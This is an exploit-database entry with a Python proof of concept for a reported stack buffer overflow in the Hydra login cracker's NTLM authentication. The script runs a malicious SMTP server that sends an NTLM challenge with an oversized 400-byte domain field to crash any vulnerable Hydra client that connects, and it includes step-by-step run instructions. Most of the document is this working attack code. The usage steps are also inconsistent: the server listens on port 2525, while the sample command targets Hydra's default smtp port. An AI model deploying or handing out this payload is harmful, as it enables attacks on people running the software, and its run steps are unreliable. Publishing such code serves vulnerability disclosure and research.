Hydra - Stack Buffer Overflow

EDB-ID:

52622


Author:

banyamer

Type:

remote


Platform:

Linux

Date:

2026-07-07


# Exploit Title:    Hydra - Stack Buffer Overflow 
# CVE:                   CVE-2026-56766
# Date:                  2026-06-26
# Exploit Author:        Mohammed Idrees Banyamer
# Author Country:        Jordan
# Instagram:             @banyamer_security
# Author GitHub:         https://github.com/mbanyamer
# Author Blog  :         https://banyamersecurity.com/blog/
# Vendor Homepage:       https://github.com/vanhauser-thc/thc-hydra
# Software Link:         https://github.com/vanhauser-thc/thc-hydra
# Affected:              Hydra <= 9.7
# Tested on:             Hydra 9.5 (Ubuntu 22.04)
# Category:              Remote
# Platform:              Linux
# Exploit Type:          Stack Buffer Overflow
# CVSS:                  7.5
# Description:           Malicious NTLM Type-2 challenge with excessively long domain
#                        causes stack buffer overflow in Hydra's NTLM authentication handler
#                        (SMTP, POP3, IMAP, etc. modules).
# Fixed in:              https://github.com/vanhauser-thc/thc-hydra/commit/9cc84c20e75f5fef6bb1790bb9ada2afad2204e2
# Usage:
#   python3 exploit.py
#
# Examples:
#   python3 exploit.py
#
# Notes:
#   • Run this PoC server first, then launch vulnerable Hydra against it.
#   • Triggers SIGSEGV in vulnerable versions.
#
# How to Use
#
# Step 1: Run the exploit server: python3 exploit.py
# Step 2: Run Hydra: hydra -l test -p test 127.0.0.1 smtp

def banner():
    print(r"""
╔██████╗  █████╗ ███╗   ██╗██╗   ██╗ █████╗ ███╗   ███╗███████╗██████╗╗
║██╔══██╗██╔══██╗████╗  ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║
║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗  ██████╔╝
║██╔══██╗██╔══██║██║╚██╗██║  ╚██╔╝  ██╔══██║██║╚██╔╝██║██╔══╝  ██╔══██╗
║██████╔╝██║  ██║██║ ╚████║   ██║   ██║  ██║██║ ╚═╝ ██║███████╗██║  ██║
╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝  ╚═╝╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝
        ╔═╗ Banyamer Security ╔═╗
""")

import socket
import base64
import struct
import threading
import time
import sys

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLM_TYPE_2 = 2

def create_ntlm_type2_challenge():
    challenge = bytearray(NTLMSSP_SIGNATURE)
    challenge += struct.pack("<I", NTLM_TYPE_2)
    
    domain_name = b"A" * 400
    domain_len = len(domain_name)
    
    flags = 0x00008201
    server_challenge = b"\x11\x22\x33\x44\x55\x66\x77\x88"
    reserved = b"\x00" * 8
    target_name_offset = 48
    
    challenge += struct.pack("<HHI", domain_len, domain_len, target_name_offset)
    challenge += struct.pack("<I", flags)
    challenge += server_challenge
    challenge += reserved
    challenge += b"\x00" * 8
    challenge += domain_name
    
    return challenge

class SMTPServer:
    def __init__(self, host='0.0.0.0', port=2525):
        self.host = host
        self.port = port
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        
    def handle_client(self, client, addr):
        client.send(b"220 poc-smtp-server ESMTP Ready\r\n")
        
        while True:
            try:
                data = client.recv(4096).decode('utf-8', errors='ignore').strip()
                if not data:
                    break
                    
                if data.upper().startswith("EHLO") or data.upper().startswith("HELO"):
                    client.send(b"250-OK\r\n250 AUTH NTLM\r\n")
                
                elif data.upper().startswith("AUTH NTLM"):
                    client.send(b"334 NTLM\r\n")
                    
                elif len(data) > 10:
                    type2 = create_ntlm_type2_challenge()
                    b64_type2 = base64.b64encode(type2).decode('ascii')
                    client.send(f"334 {b64_type2}\r\n".encode())
                    
                    time.sleep(1)
                    client.recv(8192)
                    client.send(b"235 Authentication successful (fake)\r\n")
                    break
                
                elif data.upper().startswith("QUIT"):
                    client.send(b"221 Bye\r\n")
                    break
                
            except:
                break
        
        client.close()
    
    def start(self):
        self.sock.bind((self.host, self.port))
        self.sock.listen(5)
        print(f"[+] Malicious SMTP server listening on {self.host}:{self.port}")
        print("[+] Run: hydra -l test -p test 127.0.0.1 smtp")
        
        while True:
            client, addr = self.sock.accept()
            threading.Thread(target=self.handle_client, args=(client, addr), daemon=True).start()

if __name__ == "__main__":
    banner()
    try:
        server = SMTPServer()
        server.start()
    except KeyboardInterrupt:
        print("\n[+] Server stopped")
    except Exception as e:
        print(f"[-] Error: {e}")